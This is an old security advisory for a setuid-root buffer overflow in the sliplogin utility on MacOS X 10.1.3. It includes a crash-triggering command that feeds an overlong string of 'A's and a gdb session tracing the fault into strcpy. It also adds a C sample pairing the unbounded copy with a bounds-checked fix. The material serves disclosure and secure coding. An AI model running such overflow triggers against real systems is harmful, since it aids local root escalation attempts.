
MacOS X sliplogin Buffer Overflow Vulnerability


Published: 2002-05-21
Updated: 2002-05-21
Severity:
Threat level: local administrator (root) privileges
Error type: boundary check error
Exploitation method: server mode

BUGTRAQ ID:4769

Affected systems
Apple MacOS X 10.1.3
Detailed description
sliplogin is one of the MacOS X system utilities. Passing sliplogin an overlong argument causes a buffer overflow.

Because this tool is installed SETUID ROOT, the buffer overflow can be exploited to obtain ROOT privileges.

Test code
OS X version 10.1.3

[localhost:~] elguapo% ls -al /usr/sbin/sliplogin
-r-sr-xr-x  1 root  wheel  14700 Dec  8 10:49 /usr/sbin/sliplogin

[localhost:~] elguapo% sliplogin `perl -e 'print "A" x 9000'`
Bus error

[localhost:~] elguapo% uname -a
Darwin localhost 5.3 Darwin Kernel Version 5.3: Thu Jan 24 22:06:02 PST 2002; root:xnu/xnu-201.19.obj~1/RELEASE_PPC  Power Macintosh powerpc

[localhost:~] elguapo% id
uid=501(elguapo) gid=20(staff) groups=20(staff), 0(wheel), 80(admin)
[localhost:~] elguapo% ls -al /usr/sbin/sliplogin
-r-sr-xr-x  1 root  wheel  14700 Dec  8 10:49 /usr/sbin/sliplogin
[localhost:~] elguapo% gdb /usr/sbin/sliplogin
GNU gdb 5.0-20001113 (Apple version gdb-203) (Wed Nov  7 16:28:57 GMT 2001) (UI_OUT)
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "powerpc-apple-macos10".
Reading symbols for shared libraries .. done
(gdb) r `perl -e 'print "A" x 1476'`
Starting program: /usr/sbin/sliplogin `perl -e 'print "A" x 1477'`
[Switching to thread 1 (process 339 thread 0x1603)]

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x70004c88 in strcpy ()
(gdb) bt
#0  0x70004c88 in strcpy ()
#1  0x00001bd4 in ?? ()
#2  0x00002278 in ?? ()
#3  0x00001af4 in ?? ()
#4  0x00001924 in ?? ()

I have not been able to accomplish anything short of overwriting r0 with 41.
If the sc command gets called you could control the next syscall by changing
the value in r0. I personally can do nothing with it...

(gdb) r `perl -e 'print "A" x 1478'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/sbin/sliplogin `perl -e 'print "A" x 1478'`
[Switching to thread 1 (process 351 thread 0x1c07)]

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x70004c88 in strcpy ()
(gdb) i r
r0             0x41     65
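Added example, not from the advisory or from Apple's sliplogin source: the unbounded strcpy() pattern the backtrace above points at, next to a bounds-checked replacement that refuses any argument that does not fit the destination. The buffer size LOGINNAME_MAX, the function names and the 'A'-run driver are assumptions, not sliplogin's real code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LOGINNAME_MAX 64            /* assumed fixed-size buffer */

/* Vulnerable shape: strcpy() trusts the caller's argument to fit the
 * destination. An argument longer than LOGINNAME_MAX overruns the stack
 * frame, which is what the gdb session shows crashing inside strcpy(). */
static void copy_login_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);               /* no bound: overflow on long input */
}

/* Hardened shape: measure first, refuse anything that would not fit
 * together with its terminating NUL, then copy. 0 = ok, -1 = rejected. */
static int copy_login_checked(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Result of the checked copy for a constructed argument of `arglen` 'A's
 * (the advisory's trigger uses 9000, like perl -e 'print "A" x 9000').
 * Returns 0 if accepted, -1 if rejected, -2 on allocation failure. */
int checked_copy_of_a_run(size_t arglen)
{
    char dst[LOGINNAME_MAX];
    char *arg = malloc(arglen + 1);
    int rc;
    if (arg == NULL)
        return -2;
    memset(arg, 'A', arglen);
    arg[arglen] = '\0';
    rc = copy_login_checked(dst, sizeof dst, arg);
    free(arg);
    return rc;
}

int main(void)
{
    char dst[LOGINNAME_MAX];
    copy_login_unchecked(dst, "elguapo");   /* short input fits; no overflow */
    printf("9000 x 'A': %s\n", checked_copy_of_a_run(9000) == -1 ? "rejected" : "accepted");
    printf("7 x 'A':    %s\n", checked_copy_of_a_run(7) == 0 ? "accepted" : "rejected");
    return 0;
}
```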

Solution
None yet

Related information
Kevin Finisterre
Reference: http://www.securitytracker.com/alerts/2002/May/1004317.html